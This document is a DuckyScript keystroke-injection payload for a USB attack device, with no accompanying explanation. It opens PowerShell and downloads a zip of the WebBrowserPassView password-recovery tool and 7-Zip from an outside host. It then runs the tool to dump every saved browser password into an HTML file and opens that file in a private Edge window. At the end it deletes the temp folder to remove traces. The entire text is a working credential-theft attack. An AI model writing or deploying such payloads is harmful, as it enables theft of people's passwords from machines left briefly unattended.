GUI r
DELAY 1000
STRING powershell
ENTER
DELAY 1000
ENTER
DELAY 1000
STRING rmdir -R \temp
ENTER
DELAY 1000
STRING mkdir \temp ; cd \temp ; Invoke-WebRequest -Uri https://cdn.lullaby.cafe/file/webpassview.zip -OutFile webpassview.zip ; Invoke-WebRequest -Uri https://cdn.lullaby.cafe/file/7z.zip -OutFile 7z.zip ; Expand-Archive 7z.zip ; .\7z\7za.exe e webpassview.zip
ENTER
STRING .\WebBrowserPassView.exe
ENTER
DELAY 3000
CTRL A
CTRL S
DELAY 1000
STRING export.html
TAB
STRING h
ENTER
DELAY 1000
ALT F4
DELAY 1000
STRING Start-Process msedge.exe 'file:///C:/temp/export.htm --inprivate'
ENTER
DELAY 2000
ALT TAB
DELAY 1000
STRING cd \
ENTER
STRING rmdir -R \temp
ENTER
STRING EXIT
ENTER
